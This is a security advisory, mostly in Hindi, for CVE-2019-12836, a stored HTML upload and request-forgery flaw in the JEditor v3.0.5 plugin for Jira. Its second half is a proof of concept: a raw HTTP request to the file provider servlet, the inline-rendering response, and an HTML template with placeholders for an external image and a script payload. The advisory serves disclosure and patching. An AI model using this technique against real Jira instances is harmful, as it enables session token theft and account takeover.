
CVE-2019-12836

JEditor v3.0.5 - JIRA के लिए WYSIWIG एडिटर
Jira के लिए सरल लेकिन शक्तिशाली रिच टेक्स्ट एडिटर। HTML ईमेल आयात करें, रिच सामग्री पेस्ट करें, टेम्पलेट बनाएं और फ़ील्ड प्रीपॉप्युलेट करें।
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor - Jira के लिए WYSIWYG एडिटर - v3.0.5
JEditor v3.0.5
Jira के लिए Bobronix JEditor एडिटर v3.0.6 से पहले के संस्करण में, एक हमलावर मौजूदा इश्यू में एक URL/लिंक जोड़ सकता है जो किसी आउट-ऑफ-ओरिजिन डोमेन के लिए अनुरोध को जाली बना सकता है। इसके परिणामस्वरूप एक प्रमाणित उपयोगकर्ता के संदर्भ में एक जाली अनुरोध शुरू किया जा सकता है, जिससे सत्र टोकन की चोरी और खाता अधिग्रहण हो सकता है।
JEditor v3.0.5 विभिन्न फ़ाइल एक्सटेंशन प्रकारों की फ़ाइलें अपलोड करने की अनुमति देता है, जिनमें से एक '.HTML' है। JEditor का उपयोग JIRA द्वारा इसकी फ़ाइल अपलोड कार्यक्षमता के लिए किया जाता है। इस कार्यक्षमता का उपयोग करके एक हमलावर दुर्भावनापूर्ण सामग्री अपलोड कर सकता है।
एक बार दुर्भावनापूर्ण सामग्री अपलोड हो जाने के बाद, सामग्री के लिए एक बाद का अनुरोध किया जा सकता है जो किसी भी प्रमाणित उपयोगकर्ता के ब्राउज़र के संदर्भ में सामग्री को इनलाइन प्रदर्शित और रेंडर करने की अनुमति देता है। यह एक हमलावर को किसी भी प्रमाणित उपयोगकर्ता की ओर से एक दुर्भावनापूर्ण अनुरोध जाली बनाने की अनुमति दे सकता है।
क्रॉस साइट रिक्वेस्ट फोर्जरी (CSRF)
JEditor v3.0.6 में बग फिक्स किया गया
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
एक जाली अनुरोध की अनुमति देता है जिसके परिणामस्वरूप क्लाइंट-साइड हमले का संभावित वेक्टर होता है
एम्बेडेड लिंक/URL के साथ इंटरैक्ट करने के लिए प्रमाणित उपयोगकर्ता की आवश्यकता होती है
क्रेडिट: Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna of Exploit Security